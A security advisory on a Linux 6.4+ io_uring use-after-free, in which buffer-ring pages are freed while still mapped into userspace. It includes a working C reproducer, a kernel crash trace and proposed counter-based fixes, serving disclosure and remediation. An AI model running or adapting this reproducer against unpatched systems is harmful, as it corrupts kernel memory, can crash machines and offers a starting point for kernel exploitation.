Linux 6.4 io_uring Use-After-Free

2024.01.17
Credit: Jann Horn
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Linux >=6.4: io_uring: page UAF via buffer ring mmap

Since commit c56e022c0a27 ("io_uring: add support for user mapped provided buffer ring"), which landed in Linux 6.4, io_uring makes it possible to allocate, mmap, and deallocate "buffer rings".

A "buffer ring" can be allocated with io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...). It can be mapped into userspace using mmap() with offset IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM subsystem will treat the mapping as a set of opaque page frame numbers not associated with any corresponding pages; this implies that the calling code is responsible for ensuring that the mapped memory cannot be freed before the userspace mapping is removed.

However, there is no mechanism to ensure this in io_uring: it is possible to just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free pages mapped into userspace, which is a fairly easily exploitable situation.

reproducer:
==============================================================
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_SQARRAY
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
  printf("uring_fd = %d\n", uring_fd);

  /* register a kernel-allocated buffer ring (buffer group 0) */
  struct io_uring_buf_reg reg = {
    .ring_entries = 1,
    .bgid = 0,
    .flags = IOU_PBUF_RING_MMAP
  };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));

  /* map the ring's page into userspace */
  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
  printf("pbuf mapped at %p\n", pbuf_mapping);

  /* unregister the ring: its page is freed while the mapping still exists */
  struct io_uring_buf_reg unreg = { .bgid = 0 };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));

  /* keep writing through the stale mapping */
  while (1) {
    memset(pbuf_mapping, 0xaa, 0x1000);
    usleep(100000);
  }
}
==============================================================

When run on a system with the debug options:

CONFIG_PAGE_TABLE_CHECK=y
CONFIG_PAGE_TABLE_CHECK_ENFORCED=y

this will splat with the following error when __page_table_check_zero() detects that a page that's being freed is still mapped into userspace:

==============================================================
------------[ cut here ]------------
kernel BUG at mm/page_table_check.c:146!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__page_table_check_zero+0x136/0x150
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000
FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
 <TASK>
 [...]
 free_unref_page_prepare+0x282/0x450
 free_unref_page+0x45/0x170
 __io_remove_buffers.part.0+0x38c/0x3c0
 io_unregister_pbuf_ring+0x146/0x1e0
 [...]
 __do_sys_io_uring_register+0xa03/0x11c0
 [...]
 do_syscall_64+0x43/0xf0
 entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7f745ef4bf59
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000
 </TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
==============================================================

When run on a system without those options, this reproducer will randomly corrupt memory and, on most runs, probably crash the machine. I tried it once; after I then used some other programs, I got a random kernel #GP fault.

One way to fix this might be to add some mapping counter to `struct io_buffer_list`, and then:

 - increment that counter in io_uring_validate_mmap_request() for PBUF_RING mappings
 - increment that counter in the vm_area_operations ->open() handler
 - decrement that counter in the vm_area_operations ->close() handler
 - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?

Or alternatively free the io_buffer_list when the counter drops to zero, and let the counter start at 1.

(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's memory are - it looks like most paths only access the io_buffer_list under some lock? Is the idea that the kernel actually accesses the buffer through userspace pointers, or something like that? I'll have to stare at this some more before I understand it...)

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-02-26.

Found by: jannh@google.com
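
The first fix idea suggested above (count live mappings, refuse to unregister while the count is non-zero) can be modelled in plain userspace C. This is only a sketch of the bookkeeping, not kernel code and not the fix that was eventually merged: `struct buffer_list_model` and the `model_*` helpers are hypothetical names invented for illustration, and the locking a real implementation would need is left out.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Hypothetical userspace stand-in for the kernel's struct io_buffer_list. */
struct buffer_list_model {
    unsigned int mmap_count; /* number of live userspace mappings */
    bool pages_allocated;    /* true while the ring's pages exist */
};

/*
 * Models the two places where a mapping comes into existence: a
 * successful mmap() of the ring, and the VMA ->open() handler (which
 * runs when a mapping is duplicated, for example on fork or VMA split).
 */
static void model_map_get(struct buffer_list_model *bl)
{
    bl->mmap_count++;
}

/* Models the VMA ->close() handler: one mapping has gone away. */
static void model_map_put(struct buffer_list_model *bl)
{
    assert(bl->mmap_count > 0); /* an unbalanced put would be a bug */
    bl->mmap_count--;
}

/*
 * Models IORING_UNREGISTER_PBUF_RING under this scheme: the pages may
 * only be freed once no mapping refers to them any more.
 */
static int model_unregister(struct buffer_list_model *bl)
{
    if (bl->mmap_count != 0)
        return -EBUSY; /* refuse: freeing now would leave a stale mapping */
    bl->pages_allocated = false; /* stands in for freeing the pages */
    return 0;
}
```

In this model, replaying the reproducer's sequence (map, then unregister) makes `model_unregister()` return `-EBUSY` and leaves `pages_allocated` set; only after a matching `model_map_put()` does unregistering succeed. The alternative mentioned above, where the counter starts at 1 and the pages are freed when it drops to zero, would instead move the free into the put path.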



Copyright 2025, cxsecurity.com

 
